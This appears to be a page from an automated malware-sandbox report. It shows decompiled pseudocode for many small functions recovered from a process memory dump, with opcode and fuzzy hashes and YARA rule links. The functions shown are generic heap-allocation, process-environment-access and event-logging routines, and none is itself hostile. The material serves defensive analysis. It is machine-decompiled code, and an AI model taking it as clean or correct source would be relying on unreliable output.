Opcode Fuzzy Hash: 2a898c4d6bcdfbffe4debb19bdfb13e1258ab593db5864441562fb5302e1bdc9
Instruction Fuzzy Hash: 83F0A03A42B3D84BDEBAEB6871113E56FDDD789114B0D1886D8905B60ACAB488C3CB25

Uniqueness

Uniqueness Score: -1.00%

Function 030E8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E030E8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x310d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03037D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0305B640(E03059AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x030e8d34
0x030e8d43
0x030e8d4b
0x030e8d4e
0x030e8d52
0x030e8d5c
0x030e8d6e
0x030e8d5e
0x030e8d67
0x030e8d67
0x030e8d79
0x030e8d7a
0x030e8d7c
0x030e8d81
0x030e8d94

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e04d31eb708dd55952933904f40684f8ae036e9a283083aa1d8e34899f1c8fe6
Instruction ID: 1e52cc929c1d468e105534163b66f8fb66d9721cdc7254ee4042cd867fa3b024
Opcode Fuzzy Hash: e04d31eb708dd55952933904f40684f8ae036e9a283083aa1d8e34899f1c8fe6
Instruction Fuzzy Hash: E9F0B474A0570C9FCB04EFB8D441AAEB7B8EF48700F108099F905EF290EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 030E8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E030E8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x310d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03037D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0305B640(E03059AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x030e8b67
0x030e8b6f
0x030e8b72
0x030e8b7d
0x030e8b8f
0x030e8b7f
0x030e8b88
0x030e8b88
0x030e8b9a
0x030e8b9b
0x030e8b9d
0x030e8ba2
0x030e8bb5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b4665f27ea583f6ff73d5d87edffb38dd8be527696671bed6802046af34fb2
Instruction ID: a9d0ac8835bbc4208b0ac3e5bc92856ff4396f3c651325e5d710e1069e4ede76
Opcode Fuzzy Hash: 90b4665f27ea583f6ff73d5d87edffb38dd8be527696671bed6802046af34fb2
Instruction Fuzzy Hash: 81F054B4A052589FDB04EBA4D505A6E73B8AB44600F044459B9159F280EB74D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 03014F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03014F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E030E88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0303C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2ff1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x03014f2e
0x03014f34
0x03014f38
0x03070b85
0x03070b85
0x03070b89
0x03070b9a
0x03070b9a
0x03070b9f
0x00000000
0x03070b9f
0x03070b94
0x03070b98
0x00000000
0x00000000
0x00000000
0x03070b98
0x03014f3e
0x03014f48
0x00000000
0x03014f6e
0x00000000
0x03014f70

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6445ef1cd0d3c02b51be38d25190af9c9fda3ed963df7f7ec084b61972216497
Instruction ID: 12671b7cbcf4cef7bc5c2ea55d2af3a9d0343ea91510fd622d73f3a8cb1e6d26
Opcode Fuzzy Hash: 6445ef1cd0d3c02b51be38d25190af9c9fda3ed963df7f7ec084b61972216497
Instruction Fuzzy Hash: E7F0E935D23784CFD7B0D714C188B22B7DCAF0077CF0886A5D50587960C724ED40C688

Uniqueness

Uniqueness Score: -1.00%

Function 0303746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0303746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0302EB70(__ecx, 0x31079a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E030595D0();
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0303746d
0x0303746d
0x0303746d
0x03037471
0x03037488
0x0307f92d
0x0303748e
0x03037491
0x03037495
0x0307f937
0x0307f93a
0x0307f94e
0x0307f953
0x0307f956
0x0307f956
0x03037495
0x00000000
0x03037488
0x03037473
0x03037478
0x0303747d
0x03037481
0x00000000
0x03037481
0x0303747d
0x0303747a
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6762f813f44a3236714707d5c43db3959035188503dc0cbbde44be837d2968f5
Instruction ID: 603bf9d7ba4ee86c7e840066c5bf1d36adf19eabefde27c4be6ab877411767fd
Opcode Fuzzy Hash: 6762f813f44a3236714707d5c43db3959035188503dc0cbbde44be837d2968f5
Instruction Fuzzy Hash: C1F0B474903285AACF45DB68C440BBEBBA9AF4AA10F080555D8E1AB550E765A800C785

Uniqueness

Uniqueness Score: -1.00%

Function 030E8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E030E8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x310d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03037D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0305B640(E03059AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x030e8ce5
0x030e8ced
0x030e8cf0
0x030e8cfb
0x030e8d0d
0x030e8cfd
0x030e8d06
0x030e8d06
0x030e8d18
0x030e8d19
0x030e8d1b
0x030e8d20
0x030e8d33

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b49683380493c572b5287fdc558badcac4999b77613e042c6310798ba0f093b
Instruction ID: f80a926edad02e3dfd763250351c0ac7eabdcafada8c94a7790f0d63bc1d433c
Opcode Fuzzy Hash: 2b49683380493c572b5287fdc558badcac4999b77613e042c6310798ba0f093b
Instruction Fuzzy Hash: 34F08275A06208AFCB04EBF8E945EAE77B8EF49600F144199F915EF280EA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 0304A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0304A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3107b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0305FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0304a44b
0x0304a453
0x0304a472
0x0304a476
0x00000000
0x0304a493
0x0304a47a
0x0304a47f
0x0304a486
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9296f837e962a9013b0d8e622b8b9e2d3a3701da9f10a9669447f2cf4386f2e6
Instruction ID: 4fd3971269766e233fafa283b98eb58ccb904adbb07ed9365093ebd44b7675f9
Opcode Fuzzy Hash: 9296f837e962a9013b0d8e622b8b9e2d3a3701da9f10a9669447f2cf4386f2e6
Instruction Fuzzy Hash: 27E092B2B42421ABD2119E18BC00FABB39DDBD5A51F094435F904CB254D668DE01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0301F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0301F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0304F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03034620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0301f35d
0x0301f361
0x0301f367
0x0301f372
0x0301f38c
0x0301f38c
0x0301f394

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 7d981d9bf669d79936972bbf7a45014091a1aa8fb4b33f50fceb0eda91277e71
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 6AE02032A42218FBCB31DAD99D05F9BFBBCDB84AA1F040255F904DB150D5719E10C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 0302FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0302FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2ff11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E030E88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03030050(_t14);
				}
			}

0x0302ff66
0x0302ff6b
0x00000000
0x0302ff8f
0x00000000
0x0302ff8f

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a842c0ba19d824a65a7f323fa7e3be5e7107a5a7d234fb32ff0d0555dc7b84c0
Instruction ID: 1f47073ad536345352c6e19855ed9b3439f3bda288e2d364838130921895b056
Opcode Fuzzy Hash: a842c0ba19d824a65a7f323fa7e3be5e7107a5a7d234fb32ff0d0555dc7b84c0
Instruction Fuzzy Hash: 29E0DFB020B315DFD7B4DB51D260F6A7FFCAF826A1F1D849EE8084B101C661D880C706

Uniqueness

Uniqueness Score: -1.00%

Function 030CD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030CD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0301E8B0(__ecx, _a4, 0xfff);
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x030cd38a
0x030cd39b
0x030cd3b1
0x00000000
0x030cd3b6
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 2f68d95982f40c479ba4156680c93697eb918655fb5133e2143df12187274524
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: D0E0C235282348BBDB229F44CC00FADBB5ADB80BA0F104035FE085E690C6B19CA1D6C8

Uniqueness

Uniqueness Score: -1.00%

Function 030A41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E030A41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x30f08f0);
				_t5 = E0306D08C(__ebx, __edi, __esi);
				if( *0x31087ec == 0) {
					E0302EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x31087ec == 0) {
						 *0x31087f0 = 0x31087ec;
						 *0x31087ec = 0x31087ec;
						 *0x31087e8 = 0x31087e4;
						 *0x31087e4 = 0x31087e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L030A4248();
				}
				return E0306D0D1(_t5);
			}

0x030a41e8
0x030a41ea
0x030a41ef
0x030a41fb
0x030a4206
0x030a420b
0x030a4216
0x030a421d
0x030a4222
0x030a422c
0x030a4231
0x030a4231
0x030a4236
0x030a423d
0x030a423d
0x030a4247

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68e4cb888f4322204173cfb72ff342461e95bf7136b26c38ce86bbf4961b51d
Instruction ID: 78115c6505d3e3506727139098dab00a1b134ceb793f11dc0f1a2a1b4cd7a703
Opcode Fuzzy Hash: a68e4cb888f4322204173cfb72ff342461e95bf7136b26c38ce86bbf4961b51d
Instruction Fuzzy Hash: EDF0157C95AB24CFDBA5EFA9E50074836A4F78C319F40416A81108B6CDC7F44481CF25

Uniqueness

Uniqueness Score: -1.00%

Function 0304A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0304A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x31067e4 >= 0xa) {
					if(_t5 < 0x3106800 || _t5 >= 0x3106900) {
						return L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03030010(0x31067e0, _t5);
				}
			}

0x0304a190
0x0304a1a6
0x0304a1c2
0x00000000
0x00000000
0x00000000
0x0304a192
0x0304a192
0x0304a19f
0x0304a19f

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d10aa99aeb9b1d5906a00ebff18d245f9f076c38d3d0d1f3f6145325cdc51a
Instruction ID: 9354c9e4393456378bfd9e9c50d9cd9dab55b84054b98ab6ea0a8b199a6b8e89
Opcode Fuzzy Hash: 70d10aa99aeb9b1d5906a00ebff18d245f9f076c38d3d0d1f3f6145325cdc51a
Instruction Fuzzy Hash: E9D02EF16A31081BE62CE30C8E64B22221AE7CCB00F30082DF1030E9F0DBE088F0C118

Uniqueness

Uniqueness Score: -1.00%

Function 030416E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030416E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03041710(0x31067e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03034620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x030416e8
0x030416ef
0x030416f3
0x030416fe
0x00000000
0x03041700
0x0304170d
0x0304170d
0x030416f2
0x030416f2
0x030416f2
0x030416f2

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e164019b09e01009a45f7ccdd3f0288ba0396488e4d51c86d7e1ad5b8507b74a
Instruction ID: 41c6932ab97b34a177cbbc6cbd2be1d4aa6bcfe4d8434dbbd92e2bec0a761355
Opcode Fuzzy Hash: e164019b09e01009a45f7ccdd3f0288ba0396488e4d51c86d7e1ad5b8507b74a
Instruction Fuzzy Hash: C0D0A9B1242200A2DA2DDB15AE04B1522A6EBC4B81F3C007CF20B5D8C0CFE0CEE3E448

Uniqueness

Uniqueness Score: -1.00%

Function 030953CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030953CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0302EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x030953ca
0x030953ce
0x030953d9
0x030953de
0x030953e1
0x030953e1
0x030953e6
0x030953f3
0x00000000
0x030953f8
0x030953fb

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: a9c7769f37f86de9fa067e2080c765f7ac11cf36c8308edc798d173389451637
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: ADE08C769427849BDF13DB49CA50F8EFBF9FB89B00F180004A4085F620C624AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0302AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0302AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0302aab6
0x0302aabb
0x0307a442
0x00000000
0x0307a448
0x0307a454
0x0307a454
0x0302aac1
0x0302aac1
0x0302aac6
0x0302aac6

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 5bf6af2678a2e4085f130487c99f4bd26820469b849134941e8681b5905c5fba
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: B2D0E935352990CFDA56CB1DC554B1577E9BB44B44FC904D0E501CBB61EB2DD944CA04

Uniqueness

Uniqueness Score: -1.00%

Function 030435A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030435A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0302EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x030435a1
0x030435a1
0x030435a5
0x030435ab
0x030435ab
0x030435b5
0x00000000
0x030435c1
0x030435b7

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 076cb3bf50a38f7ae90cc9959ce5445d6ca913d9182652513d484a665aef072f
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: E1D0A9BE4432809ADB83FB10C2187ACF7B2BB40208F5C30F590020A856C33A6B2AC700

Uniqueness

Uniqueness Score: -1.00%

Function 0301DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0301DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03034620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0301db4d
0x0301db54
0x0301db5f
0x0301db56
0x0301db56
0x0301db5c
0x0301db5c

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: cfa230bd735bf19602a706e980848f18182286d8f83b6e463444bf8bf9c857fb
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 69C08C302C2B00AAEB229F20CD01B5176A4BB41B01F4804A06301DE0F0DBB8D812E600

Uniqueness

Uniqueness Score: -1.00%

Function 0309A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0309A537(intOrPtr _a4, intOrPtr _a8) {

				return L03038E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0309a553

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 4f1b8b3655560b70dc0084c66690a6aac60528a9fbbda473d759a239c5597349
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D2C01236081248BBCB12AE82CC00F467B2AEB94B60F008010BA080A5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 03033A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03033A1C(intOrPtr _a4) {
				void* _t5;

				return L03034620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x03033a35

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 35b892b350f5f577587bdd530a2408439b69515523db9edc166adfd253a72c3e
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 1AC08C32080648BBC712AE42DC00F017B2DE790B60F000020B6040E5608572EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 030436CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030436CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x030436d2
0x030436e8
0x030436d4
0x030436e5
0x030436e5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: d28df69e90d248812f4a50e817eb8af398fc7c33a7ac08b3c1b0e91d8efedfa1
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 65C02BBC192840BBE7159F30CD01F147298F740A21F6C07A472204D4F0D5689C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 030276E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030276E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x030276e4
0x00000000
0x030276f8
0x030276fd

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 9fd3212c53e9ae1b3db03022cccefa99dc0a7b57a69250ed26cb7a645725bb98
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 1DC08CB41432845AEB2AD709CE28B213A98AB08E08F4C019CEA020D8A2C368A802C308

Uniqueness

Uniqueness Score: -1.00%

Function 0301AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0301AD30(intOrPtr _a4) {

				return L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0301ad49

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 21187af89757fb79880801b350df7a72ca2806c08abaf09494c6a4774200852f
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 44C08C32080248BBC712AA45CD00F027B2DE790B60F000020F6040A6618932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 03037D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03037D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x03037d56
0x03037d5b
0x03037d60
0x03037d5d
0x03037d5d
0x03037d5d

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: d114d6e079fc0877725eeebe5fe6a9b2df8a3cca8711da652504971b3f4678b4
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
